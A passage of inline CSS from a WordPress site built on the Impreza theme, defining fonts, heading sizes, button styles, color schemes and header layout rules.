id="us-theme-options-css">@font-face{font-family:'Font Awesome 5 Brands';font-style:normal;font-weight:normal;src:url("https://tvp.nyc/wp-content/themes/Impreza/fonts/fa-brands-400.woff2") format("woff2"),url("https://tvp.nyc/wp-content/themes/Impreza/fonts/fa-brands-400.woff") format("woff")}.fab{font-family:'Font Awesome 5 Brands'}@font-face{font-family:'fontawesome';font-style:normal;font-weight:300;src:url("https://tvp.nyc/wp-content/themes/Impreza/fonts/fa-light-300.woff2") format("woff2"),url("https://tvp.nyc/wp-content/themes/Impreza/fonts/fa-light-300.woff") format("woff")}.fal{font-family:'fontawesome';font-weight:300}@font-face{font-family:'fontawesome';font-style:normal;font-weight:400;src:url("https://tvp.nyc/wp-content/themes/Impreza/fonts/fa-regular-400.woff2") format("woff2"),url("https://tvp.nyc/wp-content/themes/Impreza/fonts/fa-regular-400.woff") format("woff")}.far{font-family:'fontawesome';font-weight:400}@font-face{font-family:'fontawesome';font-style:normal;font-weight:900;src:url("https://tvp.nyc/wp-content/themes/Impreza/fonts/fa-solid-900.woff2") format("woff2"),url("https://tvp.nyc/wp-content/themes/Impreza/fonts/fa-solid-900.woff") format("woff")}.fa,.fas{font-family:'fontawesome';font-weight:900}.style_phone6-1>div{background-image:url(https://tvp.nyc/wp-content/themes/Impreza/framework/img/phone-6-black-real.png)}.style_phone6-2>div{background-image:url(https://tvp.nyc/wp-content/themes/Impreza/framework/img/phone-6-white-real.png)}.style_phone6-3>div{background-image:url(https://tvp.nyc/wp-content/themes/Impreza/framework/img/phone-6-black-flat.png)}.style_phone6-4>div{background-image:url(https://tvp.nyc/wp-content/themes/Impreza/framework/img/phone-6-white-flat.png)}html,.l-header .widget{font-family:'Raleway', sans-serif;font-weight:500;font-size:16px;line-height:23px}h1, h2, h3, h4, h5, h6{font-family:'Montserrat', sans-serif;font-weight:400}h1{font-size:86px;line-height:1.1;font-weight:800;letter-spacing:0em}h2{font-size:62px;line-height:1.1;font-weight:500;letter-spacing:0em}h3{font-size:34px;line-height:1.4;font-weight:400;letter-spacing:0em}h4,.widgettitle,.comment-reply-title{font-size:22px;line-height:1.4;font-weight:600;letter-spacing:0em}h5{font-size:16px;line-height:1.4;font-weight:600;letter-spacing:0em}h6{font-size:16px;line-height:1.4;font-weight:600;letter-spacing:0em}@media (max-width:767px){html{font-size:14px;line-height:28px}h1{font-size:32px}h1.vc_custom_heading{font-size:32px !important}h2{font-size:26px}h2.vc_custom_heading{font-size:26px !important}h3{font-size:18px}h3.vc_custom_heading{font-size:18px !important}h4,.widgettitle,.comment-reply-title{font-size:14px}h4.vc_custom_heading{font-size:14px !important}h5{font-size:14px}h5.vc_custom_heading{font-size:14px !important}h6{font-size:14px}h6.vc_custom_heading{font-size:14px !important}}body,.l-header.pos_fixed{min-width:1240px}.l-canvas.type_boxed,.l-canvas.type_boxed .l-subheader,.l-canvas.type_boxed .l-section.type_sticky,.l-canvas.type_boxed~.l-footer{max-width:1240px}.l-subheader-h,.l-main-h,.l-section-h,.w-tabs-section-content-h,.w-blogpost-body{max-width:1300px}.l-sidebar{width:25%}.l-content{width:68%}@media (max-width:899px){.g-cols>div:not([class*=" vc_col-"]){width:100%;margin:0 0 1rem}.g-cols.type_boxes>div,.g-cols>div:last-child,.g-cols>div.has-fill{margin-bottom:0}.vc_wp_custommenu.layout_hor,.align_center_xs,.align_center_xs .w-socials{text-align:center}}.tribe-events-button,button[type="submit"]:not(.w-btn),input[type="submit"]{text-transform:uppercase;font-style:normal;font-weight:600;letter-spacing:0em;border-radius:0em;padding:0.9em 1.5em;box-shadow:0 0em 0em rgba(0,0,0,0.2);background-color:#aab2bd;border-color:transparent;color:#ffffff!important}.tribe-events-button,button[type="submit"]:not(.w-btn):before,input[type="submit"]{border-width:2px}.no-touch .tribe-events-button:hover,.no-touch button[type="submit"]:not(.w-btn):hover,.no-touch input[type="submit"]:hover{box-shadow:0 0em 0em rgba(0,0,0,0.2);background-color:#e0e0e0;border-color:transparent;color:#ffffff!important}.us-btn-style_1{color:#ffffff!important;font-family:'Raleway', sans-serif;font-weight:600;font-style:normal;text-transform:uppercase;letter-spacing:0em;border-radius:0em;padding:0.9em 1.5em;background-color:#aab2bd;border-color:transparent;box-shadow:0 0em 0em rgba(0,0,0,0.2)}.us-btn-style_1:before{border-width:2px}.no-touch .us-btn-style_1:hover{color:#ffffff!important;box-shadow:0 0em 0em rgba(0,0,0,0.2);background-color:#e0e0e0;border-color:transparent}.us-btn-style_1{overflow:hidden}.us-btn-style_1>*{position:relative;z-index:1}.no-touch .us-btn-style_1:hover{background-color:#aab2bd}.no-touch .us-btn-style_1:after{content:'';position:absolute;top:0;left:0;right:0;height:0;transition:height 0.3s;background-color:#e0e0e0}.no-touch .us-btn-style_1:hover:after{height:100%}.us-btn-style_2{color:#000000!important;font-family:'Raleway', sans-serif;font-weight:700;font-style:normal;text-transform:uppercase;letter-spacing:0em;border-radius:0em;padding:0.9em 1.5em;background-color:#e0e0e0;border-color:transparent;box-shadow:0 0em 0em rgba(0,0,0,0.2)}.us-btn-style_2:before{border-width:2px}.no-touch .us-btn-style_2:hover{color:#000000!important;box-shadow:0 0em 0em rgba(0,0,0,0.2);background-color:rgba(0,0,0,0.05);border-color:transparent}.us-btn-style_2{overflow:hidden}.us-btn-style_2>*{position:relative;z-index:1}.no-touch .us-btn-style_2:hover{background-color:#e0e0e0}.no-touch .us-btn-style_2:after{content:'';position:absolute;top:0;left:0;right:0;height:0;transition:height 0.3s;background-color:rgba(0,0,0,0.05)}.no-touch .us-btn-style_2:hover:after{height:100%}.us-btn-style_3{color:#000000!important;font-family:'Raleway', sans-serif;font-weight:700;font-style:normal;text-transform:uppercase;letter-spacing:0em;border-radius:0em;padding:0.9em 1.5em;background-color:transparent;border-color:#e0e0e0;box-shadow:0 0em 0em rgba(0,0,0,0.2)}.us-btn-style_3:before{border-width:2px}.no-touch .us-btn-style_3:hover{color:#000000!important;box-shadow:0 0em 0em rgba(0,0,0,0.2);background-color:#e0e0e0;border-color:#e0e0e0}.us-btn-style_3{overflow:hidden}.us-btn-style_3>*{position:relative;z-index:1}.no-touch .us-btn-style_3:hover{background-color:transparent}.no-touch .us-btn-style_3:after{content:'';position:absolute;top:0;left:0;right:0;height:0;transition:height 0.3s;background-color:#e0e0e0}.no-touch .us-btn-style_3:hover:after{height:100%}a,button,input[type="submit"],.ui-slider-handle{outline:none !important}.w-header-show,.w-toplink{background-color:rgba(0,0,0,0.3)}body{background-color:#e3e8e8;-webkit-tap-highlight-color:rgb(0,0,0)}.l-subheader.at_top,.l-subheader.at_top .w-dropdown-list,.l-subheader.at_top .type_mobile .w-nav-list.level_1{background-color:}.l-subheader.at_top,.l-subheader.at_top .w-dropdown.opened,.l-subheader.at_top .type_mobile .w-nav-list.level_1{color:#000000}.no-touch .l-subheader.at_top a:hover,.no-touch .l-header.bg_transparent .l-subheader.at_top .w-dropdown.opened a:hover{color:#aab2bd}.l-subheader.at_middle,.l-subheader.at_middle .w-dropdown-list,.l-subheader.at_middle .type_mobile .w-nav-list.level_1{background-color:#ffffff}.l-subheader.at_middle,.l-subheader.at_middle .w-dropdown.opened,.l-subheader.at_middle .type_mobile .w-nav-list.level_1{color:#000000}.no-touch .l-subheader.at_middle a:hover,.no-touch .l-header.bg_transparent .l-subheader.at_middle .w-dropdown.opened a:hover{color:#aab2bd}.l-subheader.at_bottom,.l-subheader.at_bottom .w-dropdown-list,.l-subheader.at_bottom .type_mobile .w-nav-list.level_1{background-color:#f2f3f5}.l-subheader.at_bottom,.l-subheader.at_bottom .w-dropdown.opened,.l-subheader.at_bottom .type_mobile .w-nav-list.level_1{color:#000000}.no-touch .l-subheader.at_bottom a:hover,.no-touch .l-header.bg_transparent .l-subheader.at_bottom .w-dropdown.opened a:hover{color:#aab2bd}.l-header.bg_transparent:not(.sticky) .l-subheader{color:#ffffff}.no-touch .l-header.bg_transparent:not(.sticky) .w-text a:hover,.no-touch .l-header.bg_transparent:not(.sticky) .w-html a:hover,.no-touch .l-header.bg_transparent:not(.sticky) .w-dropdown a:hover,.no-touch .l-header.bg_transparent:not(.sticky) .type_desktop .menu-item.level_1:hover>.w-nav-anchor{color:#ffffff}.l-header.bg_transparent:not(.sticky) .w-nav-title:after{background-color:#ffffff}.w-search-form{background-color:#ffffff;color:#434955}.menu-item.level_1>.w-nav-anchor:focus,.no-touch .menu-item.level_1.opened>.w-nav-anchor,.no-touch .menu-item.level_1:hover>.w-nav-anchor{background-color:;color:#aab2bd}.w-nav-title:after{background-color:#aab2bd}.menu-item.level_1.current-menu-item>.w-nav-anchor,.menu-item.level_1.current-menu-parent>.w-nav-anchor,.menu-item.level_1.current-menu-ancestor>.w-nav-anchor{background-color:;color:#787e87}.l-header.bg_transparent:not(.sticky) .type_desktop .menu-item.level_1.current-menu-item>.w-nav-anchor,.l-header.bg_transparent:not(.sticky) .type_desktop .menu-item.level_1.current-menu-ancestor>.w-nav-anchor{background-color:transparent;color:#aab2bd}.w-nav-list:not(.level_1){background-color:#439d9e;color:#ffffff}.no-touch .menu-item:not(.level_1)>.w-nav-anchor:focus,.no-touch .menu-item:not(.level_1):hover>.w-nav-anchor{background-color:#439d9e;color:#ffffff}.menu-item:not(.level_1).current-menu-item>.w-nav-anchor,.menu-item:not(.level_1).current-menu-parent>.w-nav-anchor,.menu-item:not(.level_1).current-menu-ancestor>.w-nav-anchor{background-color:#aab2bd;color:#ffffff}.btn.menu-item>a{background-color: !important;color:#ffffff !important}.no-touch .btn.menu-item>a:hover{background-color: !important;color:#ffffff !important}body.us_iframe,.l-preloader,.l-canvas,.l-footer,.l-popup-box-content,.g-filters.style_1 .g-filters-item.active,.w-pricing-item-h,.w-tabs.layout_default .w-tabs-item.active,.w-tabs.layout_ver .w-tabs-item.active,.no-touch .w-tabs.layout_default .w-tabs-item.active:hover,.no-touch .w-tabs.layout_ver .w-tabs-item.active:hover,.w-tabs.layout_timeline .w-tabs-item,.w-tabs.layout_timeline .w-tabs-section-header-h,.leaflet-popup-content-wrapper,.leaflet-popup-tip,.wpml-ls-statics-footer,.select2-selection__choice,.select2-search input{background-color:#ffffff}.w-tabs.layout_modern .w-tabs-item:after{border-bottom-color:#ffffff}.w-iconbox.style_circle.color_contrast .w-iconbox-icon{color:#ffffff}input,textarea,select,.l-section.for_blogpost .w-blogpost-preview,.w-actionbox.color_light,.w-form-row.for_checkbox label>i,.g-filters.style_1,.g-filters.style_2 .g-filters-item.active,.w-flipbox-front,.w-grid-none,.w-iconbox.style_circle.color_light .w-iconbox-icon,.w-pricing-item-header,.w-progbar-bar,.w-progbar.style_3 .w-progbar-bar:before,.w-progbar.style_3 .w-progbar-bar-count,.w-socials.style_solid .w-socials-item-link,.w-tabs.layout_default .w-tabs-list,.w-tabs.layout_ver .w-tabs-list,.no-touch .l-main .widget_nav_menu a:hover,.wp-caption-text,.smile-icon-timeline-wrap .timeline-wrapper .timeline-block,.smile-icon-timeline-wrap .timeline-feature-item.feat-item,.wpml-ls-legacy-dropdown a,.wpml-ls-legacy-dropdown-click a,.tablepress .row-hover tr:hover td,.select2-selection,.select2-dropdown{background-color:#efefef}.timeline-wrapper .timeline-post-right .ult-timeline-arrow l,.timeline-wrapper .timeline-post-left .ult-timeline-arrow l,.timeline-feature-item.feat-item .ult-timeline-arrow l{border-color:#efefef}hr,td,th,.l-section,.vc_column_container,.vc_column-inner,.w-author,.w-comments .children,.w-image,.w-pricing-item-h,.w-profile,.w-sharing-item,.w-tabs-list,.w-tabs-section,.widget_calendar #calendar_wrap,.l-main .widget_nav_menu .menu,.l-main .widget_nav_menu .menu-item a,.smile-icon-timeline-wrap .timeline-line{border-color:#e0e0e0}blockquote:before,.w-separator.color_border,.w-iconbox.color_light .w-iconbox-icon{color:#e0e0e0}.w-flipbox-back,.w-iconbox.style_circle.color_light .w-iconbox-icon,.no-touch .wpml-ls-sub-menu a:hover{background-color:#e0e0e0}.w-iconbox.style_outlined.color_light .w-iconbox-icon,.w-person-links-item,.w-socials.style_outlined .w-socials-item-link,.pagination .page-numbers{box-shadow:0 0 0 2px #e0e0e0 inset}.w-tabs.layout_trendy .w-tabs-list{box-shadow:0 -1px 0 #e0e0e0 inset}h1, h2, h3, h4, h5, h6,.w-counter.color_heading .w-counter-value{color:#000000}.w-progbar.color_heading .w-progbar-bar-h{background-color:#000000}input,textarea,select,.l-canvas,.l-footer,.l-popup-box-content,.w-form-row-field:before,.w-iconbox.color_light.style_circle .w-iconbox-icon,.w-tabs.layout_timeline .w-tabs-item,.w-tabs.layout_timeline .w-tabs-section-header-h,.leaflet-popup-content-wrapper,.leaflet-popup-tip,.select2-dropdown{color:#000000}.w-iconbox.style_circle.color_contrast .w-iconbox-icon,.w-progbar.color_text .w-progbar-bar-h,.w-scroller-dot span{background-color:#000000}.w-iconbox.style_outlined.color_contrast .w-iconbox-icon{box-shadow:0 0 0 2px #000000 inset}.w-scroller-dot span{box-shadow:0 0 0 2px #000000}a{color:#aab2bd}.no-touch a:hover,.no-touch .tablepress .sorting:hover{color:#e0e0e0}.highlight_primary,.g-preloader,.l-main .w-contacts-item:before,.w-counter.color_primary .w-counter-value,.g-filters.style_1 .g-filters-item.active,.g-filters.style_3 .g-filters-item.active,.w-form-row.focused .w-form-row-field:before,.w-iconbox.color_primary .w-iconbox-icon,.w-separator.color_primary,.w-sharing.type_outlined.color_primary .w-sharing-item,.no-touch .w-sharing.type_simple.color_primary .w-sharing-item:hover .w-sharing-icon,.w-tabs.layout_default .w-tabs-item.active,.w-tabs.layout_trendy .w-tabs-item.active,.w-tabs.layout_ver .w-tabs-item.active,.w-tabs-section.active .w-tabs-section-header,.tablepress .sorting_asc,.tablepress .sorting_desc,.no-touch .owl-prev:hover,.no-touch .owl-next:hover{color:}.l-section.color_primary,.no-touch .l-navigation-item:hover .l-navigation-item-arrow,.g-placeholder,.highlight_primary_bg,.w-actionbox.color_primary,.w-form-row.for_checkbox label>input:checked + i,.no-touch .g-filters.style_1 .g-filters-item:hover,.no-touch .g-filters.style_2 .g-filters-item:hover,.w-grid-item-placeholder,.w-grid-item-elm.post_taxonomy.style_badge a,.w-iconbox.style_circle.color_primary .w-iconbox-icon,.no-touch .w-iconbox.style_circle .w-iconbox-icon:before,.no-touch .w-iconbox.style_outlined .w-iconbox-icon:before,.no-touch .w-person-links-item:before,.w-pricing-item.type_featured .w-pricing-item-header,.w-progbar.color_primary .w-progbar-bar-h,.w-sharing.type_solid.color_primary .w-sharing-item,.w-sharing.type_fixed.color_primary .w-sharing-item,.w-sharing.type_outlined.color_primary .w-sharing-item:before,.w-socials-item-link-hover,.w-tabs.layout_modern .w-tabs-list,.w-tabs.layout_trendy .w-tabs-item:after,.w-tabs.layout_timeline .w-tabs-item:before,.w-tabs.layout_timeline .w-tabs-section-header-h:before,.no-touch .w-header-show:hover,.no-touch .w-toplink.active:hover,.no-touch .pagination .page-numbers:before,.pagination .page-numbers.current,.l-main .widget_nav_menu .menu-item.current-menu-item>a,.rsThumb.rsNavSelected,.no-touch .tp-leftarrow.custom:before,.no-touch .tp-rightarrow.custom:before,.smile-icon-timeline-wrap .timeline-separator-text .sep-text,.smile-icon-timeline-wrap .timeline-wrapper .timeline-dot,.smile-icon-timeline-wrap .timeline-feature-item .timeline-dot,.select2-results__option--highlighted{background-color:}.no-touch .owl-prev:hover,.no-touch .owl-next:hover,.no-touch .w-logos.style_1 .w-logos-item:hover,.w-tabs.layout_default .w-tabs-item.active,.w-tabs.layout_ver .w-tabs-item.active,.owl-dot.active span,.rsBullet.rsNavSelected span,.tp-bullets.custom .tp-bullet{border-color:}.l-main .w-contacts-item:before,.w-iconbox.color_primary.style_outlined .w-iconbox-icon,.w-sharing.type_outlined.color_primary .w-sharing-item,.w-tabs.layout_timeline .w-tabs-item,.w-tabs.layout_timeline .w-tabs-section-header-h{box-shadow:0 0 0 2pxinset}input:focus,textarea:focus,select:focus,.select2-container--focus .select2-selection{box-shadow:0 0 0 2px }.no-touch .w-blognav-item:hover .w-blognav-title,.w-counter.color_secondary .w-counter-value,.w-iconbox.color_secondary .w-iconbox-icon,.w-separator.color_secondary,.w-sharing.type_outlined.color_secondary .w-sharing-item,.no-touch .w-sharing.type_simple.color_secondary .w-sharing-item:hover .w-sharing-icon,.highlight_secondary{color:}.l-section.color_secondary,.no-touch .w-grid-item-elm.post_taxonomy.style_badge a:hover,.no-touch .l-section.preview_trendy .w-blogpost-meta-category a:hover,.w-actionbox.color_secondary,.w-iconbox.style_circle.color_secondary .w-iconbox-icon,.w-progbar.color_secondary .w-progbar-bar-h,.w-sharing.type_solid.color_secondary .w-sharing-item,.w-sharing.type_fixed.color_secondary .w-sharing-item,.w-sharing.type_outlined.color_secondary .w-sharing-item:before,.highlight_secondary_bg{background-color:}.w-separator.color_secondary{border-color:}.w-iconbox.color_secondary.style_outlined .w-iconbox-icon,.w-sharing.type_outlined.color_secondary .w-sharing-item{box-shadow:0 0 0 2pxinset}.l-main .w-author-url,.l-main .w-blogpost-meta>*,.l-main .w-profile-link.for_logout,.l-main .widget_tag_cloud,.highlight_faded{color:#aab2bd}.l-section.color_alternate,.color_alternate .g-filters.style_1 .g-filters-item.active,.color_alternate .w-pricing-item-h,.color_alternate .w-tabs.layout_default .w-tabs-item.active,.no-touch .color_alternate .w-tabs.layout_default .w-tabs-item.active:hover,.color_alternate .w-tabs.layout_ver .w-tabs-item.active,.no-touch .color_alternate .w-tabs.layout_ver .w-tabs-item.active:hover,.color_alternate .w-tabs.layout_timeline .w-tabs-item,.color_alternate .w-tabs.layout_timeline .w-tabs-section-header-h{background-color:#efefef}.color_alternate .w-iconbox.style_circle.color_contrast .w-iconbox-icon{color:#efefef}.color_alternate .w-tabs.layout_modern .w-tabs-item:after{border-bottom-color:#efefef}.color_alternate input,.color_alternate textarea,.color_alternate select,.color_alternate .g-filters.style_1,.color_alternate .g-filters.style_2 .g-filters-item.active,.color_alternate .w-grid-none,.color_alternate .w-iconbox.style_circle.color_light .w-iconbox-icon,.color_alternate .w-pricing-item-header,.color_alternate .w-progbar-bar,.color_alternate .w-socials.style_solid .w-socials-item-link,.color_alternate .w-tabs.layout_default .w-tabs-list,.color_alternate .wp-caption-text,.color_alternate .ginput_container_creditcard{background-color:#ffffff}.l-section.color_alternate,.color_alternate td,.color_alternate th,.color_alternate .vc_column_container,.color_alternate .vc_column-inner,.color_alternate .w-author,.color_alternate .w-comments .children,.color_alternate .w-image,.color_alternate .w-pricing-item-h,.color_alternate .w-profile,.color_alternate .w-sharing-item,.color_alternate .w-tabs-list,.color_alternate .w-tabs-section{border-color:#e0e0e0}.color_alternate .w-separator.color_border,.color_alternate .w-iconbox.color_light .w-iconbox-icon{color:#e0e0e0}.color_alternate .w-iconbox.style_circle.color_light .w-iconbox-icon{background-color:#e0e0e0}.color_alternate .w-iconbox.style_outlined.color_light .w-iconbox-icon,.color_alternate .w-person-links-item,.color_alternate .w-socials.style_outlined .w-socials-item-link,.color_alternate .pagination .page-numbers{box-shadow:0 0 0 2px #e0e0e0 inset}.color_alternate .w-tabs.layout_trendy .w-tabs-list{box-shadow:0 -1px 0 #e0e0e0 inset}.l-section.color_alternate h1,.l-section.color_alternate h2,.l-section.color_alternate h3,.l-section.color_alternate h4,.l-section.color_alternate h5,.l-section.color_alternate h6,.l-section.color_alternate .w-counter-value{color:#000000}.color_alternate .w-progbar.color_contrast .w-progbar-bar-h{background-color:#000000}.l-section.color_alternate,.color_alternate input,.color_alternate textarea,.color_alternate select,.color_alternate .w-iconbox.color_contrast .w-iconbox-icon,.color_alternate .w-iconbox.color_light.style_circle .w-iconbox-icon,.color_alternate .w-tabs.layout_timeline .w-tabs-item,.color_alternate .w-tabs.layout_timeline .w-tabs-section-header-h{color:#000000}.color_alternate .w-iconbox.style_circle.color_contrast .w-iconbox-icon{background-color:#000000}.color_alternate .w-iconbox.style_outlined.color_contrast .w-iconbox-icon{box-shadow:0 0 0 2px #000000 inset}.color_alternate a{color:#aab2bd}.no-touch .color_alternate a:hover{color:#e0e0e0}.color_alternate .highlight_primary,.l-main .color_alternate .w-contacts-item:before,.color_alternate .w-counter.color_primary .w-counter-value,.color_alternate .g-preloader,.color_alternate .g-filters.style_1 .g-filters-item.active,.color_alternate .g-filters.style_3 .g-filters-item.active,.color_alternate .w-form-row.focused .w-form-row-field:before,.color_alternate .w-iconbox.color_primary .w-iconbox-icon,.no-touch .color_alternate .owl-prev:hover,.no-touch .color_alternate .owl-next:hover,.color_alternate .w-separator.color_primary,.color_alternate .w-tabs.layout_default .w-tabs-item.active,.color_alternate .w-tabs.layout_trendy .w-tabs-item.active,.color_alternate .w-tabs.layout_ver .w-tabs-item.active,.color_alternate .w-tabs-section.active .w-tabs-section-header{color:}.color_alternate .highlight_primary_bg,.color_alternate .w-actionbox.color_primary,.no-touch .color_alternate .g-filters.style_1 .g-filters-item:hover,.no-touch .color_alternate .g-filters.style_2 .g-filters-item:hover,.color_alternate .w-iconbox.style_circle.color_primary .w-iconbox-icon,.no-touch .color_alternate .w-iconbox.style_circle .w-iconbox-icon:before,.no-touch .color_alternate .w-iconbox.style_outlined .w-iconbox-icon:before,.color_alternate .w-pricing-item.type_featured .w-pricing-item-header,.color_alternate .w-progbar.color_primary .w-progbar-bar-h,.color_alternate .w-tabs.layout_modern .w-tabs-list,.color_alternate .w-tabs.layout_trendy .w-tabs-item:after,.color_alternate .w-tabs.layout_timeline .w-tabs-item:before,.color_alternate .w-tabs.layout_timeline .w-tabs-section-header-h:before,.no-touch .color_alternate .pagination .page-numbers:before,.color_alternate .pagination .page-numbers.current{background-color:}.no-touch .color_alternate .owl-prev:hover,.no-touch .color_alternate .owl-next:hover,.no-touch .color_alternate .w-logos.style_1 .w-logos-item:hover,.color_alternate .w-tabs.layout_default .w-tabs-item.active,.color_alternate .w-tabs.layout_ver .w-tabs-item.active,.no-touch .color_alternate .w-tabs.layout_default .w-tabs-item.active:hover,.no-touch .color_alternate .w-tabs.layout_ver .w-tabs-item.active:hover{border-color:}.l-main .color_alternate .w-contacts-item:before,.color_alternate .w-iconbox.color_primary.style_outlined .w-iconbox-icon,.color_alternate .w-tabs.layout_timeline .w-tabs-item,.color_alternate .w-tabs.layout_timeline .w-tabs-section-header-h{box-shadow:0 0 0 2pxinset}.color_alternate input:focus,.color_alternate textarea:focus,.color_alternate select:focus{box-shadow:0 0 0 2px }.color_alternate .highlight_secondary,.color_alternate .w-counter.color_secondary .w-counter-value,.color_alternate .w-iconbox.color_secondary .w-iconbox-icon,.color_alternate .w-separator.color_secondary{color:}.color_alternate .highlight_secondary_bg,.color_alternate .w-actionbox.color_secondary,.color_alternate .w-iconbox.style_circle.color_secondary .w-iconbox-icon,.color_alternate .w-progbar.color_secondary .w-progbar-bar-h{background-color:}.color_alternate .w-iconbox.color_secondary.style_outlined .w-iconbox-icon{box-shadow:0 0 0 2pxinset}.color_alternate .highlight_faded,.color_alternate .w-profile-link.for_logout{color:#aab2bd}.color_footer-top{background-color:rgba(255,255,255,0)}.color_footer-top input:not([type="submit"]),.color_footer-top textarea,.color_footer-top select,.color_footer-top .w-socials.style_solid .w-socials-item-link{background-color:#ffffff}.color_footer-top,.color_footer-top td,.color_footer-top th,.color_footer-top .vc_column_container,.color_footer-top .vc_column-inner,.color_footer-top .w-author,.color_footer-top .w-image,.color_footer-top .w-pricing-item-h,.color_footer-top .w-profile,.color_footer-top .w-sharing-item,.color_footer-top .w-tabs-list,.color_footer-top .w-tabs-section{border-color:#efefef}.color_footer-top .w-separator.color_border{color:#efefef}.color_footer-top .w-socials.style_outlined .w-socials-item-link{box-shadow:0 0 0 2px #efefef inset}.color_footer-top,.color_footer-top input,.color_footer-top textarea,.color_footer-top select{color:#000000}.color_footer-top a{color:#000000}.no-touch .color_footer-top a:hover,.no-touch .color_footer-top .w-form-row.focused .w-form-row-field:before{color:#439d9e}.color_footer-top input:focus,.color_footer-top textarea:focus,.color_footer-top select:focus{box-shadow:0 0 0 2px #439d9e}.color_footer-bottom{background-color:rgba(255,255,255,0)}.color_footer-bottom input:not([type="submit"]),.color_footer-bottom textarea,.color_footer-bottom select,.color_footer-bottom .w-socials.style_solid .w-socials-item-link{background-color:rgba(255,255,255,0)}.color_footer-bottom,.color_footer-bottom td,.color_footer-bottom th,.color_footer-bottom .vc_column_container,.color_footer-bottom .vc_column-inner,.color_footer-bottom .w-author,.color_footer-bottom .w-image,.color_footer-bottom .w-pricing-item-h,.color_footer-bottom .w-profile,.color_footer-bottom .w-sharing-item,.color_footer-bottom .w-tabs-list,.color_footer-bottom .w-tabs-section{border-color:#efefef}.color_footer-bottom .w-separator.color_border{color:#efefef}.color_footer-bottom .w-socials.style_outlined .w-socials-item-link{box-shadow:0 0 0 2px #efefef inset}.color_footer-bottom,.color_footer-bottom input,.color_footer-bottom textarea,.color_footer-bottom select{color:#000000}.color_footer-bottom a{color:#333333}.no-touch .color_footer-bottom a:hover,.no-touch .color_footer-bottom .w-form-row.focused .w-form-row-field:before{color:#439d9e}.color_footer-bottom input:focus,.color_footer-bottom textarea:focus,.color_footer-bottom select:focus{box-shadow:0 0 0 2px #439d9e}.header_hor:not(.rtl) .w-nav.type_desktop .menu-item-7215 .w-nav-list.level_2{right:0;transform-origin:100% 0}.header_hor.rtl .w-nav.type_desktop .menu-item-7215 .w-nav-list.level_2{left:0;transform-origin:0 0}.w-nav.type_desktop .menu-item-7215 .w-nav-list.level_2{padding:0;background-size:cover;background-repeat:repeat;background-position:top left}</style> <style id="us-header-css">@media (min-width:913px){.hidden_for_default{display:none !important}.l-subheader.at_top{display:none}.l-subheader.at_bottom{display:none}.l-header{position:relative;z-index:111;width:100%}.l-subheader{margin:0 auto}.l-subheader.width_full{padding-left:1.5rem;padding-right:1.5rem}.l-subheader-h{display:flex;align-items:center;position:relative;margin:0 auto;height:inherit}.w-header-show{display:none}.l-header.pos_fixed{position:fixed;left:0}.l-header.pos_fixed:not(.notransition) .l-subheader{transition-property:transform, background-color, box-shadow, line-height, height;transition-duration:0.3s;transition-timing-function:cubic-bezier(.78,.13,.15,.86)}.l-header.bg_transparent:not(.sticky) .l-subheader{box-shadow:none !important;background-image:none;background-color:transparent}.l-header.bg_transparent~.l-main .l-section.width_full.height_auto:first-child{padding-top:0 !important;padding-bottom:0 !important}.l-header.pos_static.bg_transparent{position:absolute;left:0}.l-subheader.width_full .l-subheader-h{max-width:none !important}.header_inpos_above .l-header.pos_fixed{overflow:hidden;transition:transform 0.3s;transform:translate3d(0,-100%,0)}.header_inpos_above .l-header.pos_fixed.sticky{overflow:visible;transform:none}.header_inpos_above .l-header.pos_fixed~.l-section,.header_inpos_above .l-header.pos_fixed~.l-main,.header_inpos_above .l-header.pos_fixed~.l-main .l-section:first-child{padding-top:0 !important}.l-header.shadow_thin .l-subheader.at_middle,.l-header.shadow_thin .l-subheader.at_bottom,.l-header.shadow_none.sticky .l-subheader.at_middle,.l-header.shadow_none.sticky .l-subheader.at_bottom{box-shadow:0 1px 0 rgba(0,0,0,0.08)}.l-header.shadow_wide .l-subheader.at_middle,.l-header.shadow_wide .l-subheader.at_bottom{box-shadow:0 3px 5px -1px rgba(0,0,0,0.1), 0 2px 1px -1px rgba(0,0,0,0.05)}.header_inpos_bottom .l-header.pos_fixed:not(.sticky) .w-dropdown-list{top:auto;bottom:-0.4em;padding-top:0.4em;padding-bottom:2.4em}.l-subheader-cell>.w-cart{margin-left:0;margin-right:0}.l-subheader.at_top{line-height:40;height:40}.l-header.sticky .l-subheader.at_top{line-height:0;height:0;overflow:hidden}.l-subheader.at_middle{line-height:100;height:100}.l-header.sticky .l-subheader.at_middle{line-height:60;height:60}.l-subheader.at_bottom{line-height:60px;height:60px}.l-header.sticky .l-subheader.at_bottom{line-height:40;height:40}.l-header.pos_fixed~.l-section:first-of-type,.sidebar_left .l-header.pos_fixed + .l-main,.sidebar_right .l-header.pos_fixed + .l-main,.sidebar_none .l-header.pos_fixed + .l-main .l-section:first-of-type,.sidebar_none .l-header.pos_fixed + .l-main .l-section-gap:nth-child(2),.header_inpos_below .l-header.pos_fixed~.l-main .l-section:nth-of-type(2),.l-header.pos_static.bg_transparent~.l-section:first-of-type,.sidebar_left .l-header.pos_static.bg_transparent + .l-main,.sidebar_right .l-header.pos_static.bg_transparent + .l-main,.sidebar_none .l-header.pos_static.bg_transparent + .l-main .l-section:first-of-type{padding-top:100px}.l-header.pos_static.bg_solid + .l-main .l-section.preview_trendy .w-blogpost-preview{top:-100px}.header_inpos_bottom .l-header.pos_fixed~.l-main .l-section:first-of-type{padding-bottom:100px}.l-header.bg_transparent~.l-main .l-section.valign_center:first-of-type>.l-section-h{top:-50px}.header_inpos_bottom .l-header.pos_fixed.bg_transparent~.l-main .l-section.valign_center:first-of-type>.l-section-h{top:50px}.l-header.pos_fixed~.l-main .l-section.height_full:not(:first-of-type){min-height:calc(100vh - 60px)}.admin-bar .l-header.pos_fixed~.l-main .l-section.height_full:not(:first-of-type){min-height:calc(100vh - 92px)}.l-header.pos_static.bg_solid~.l-main .l-section.height_full:first-of-type{min-height:calc(100vh - 100px)}.l-header.pos_fixed~.l-main .l-section.sticky{top:60px}.admin-bar .l-header.pos_fixed~.l-main .l-section.sticky{top:92px}.l-header.pos_fixed.sticky + .l-section.type_sticky,.sidebar_none .l-header.pos_fixed.sticky + .l-main .l-section.type_sticky:first-of-type{padding-top:60px}.header_inpos_below .l-header.pos_fixed:not(.sticky){position:absolute;top:100%}.header_inpos_bottom .l-header.pos_fixed:not(.sticky){position:absolute;bottom:0}.header_inpos_below .l-header.pos_fixed~.l-main .l-section:first-of-type,.header_inpos_bottom .l-header.pos_fixed~.l-main .l-section:first-of-type{padding-top:0 !important}.header_inpos_below 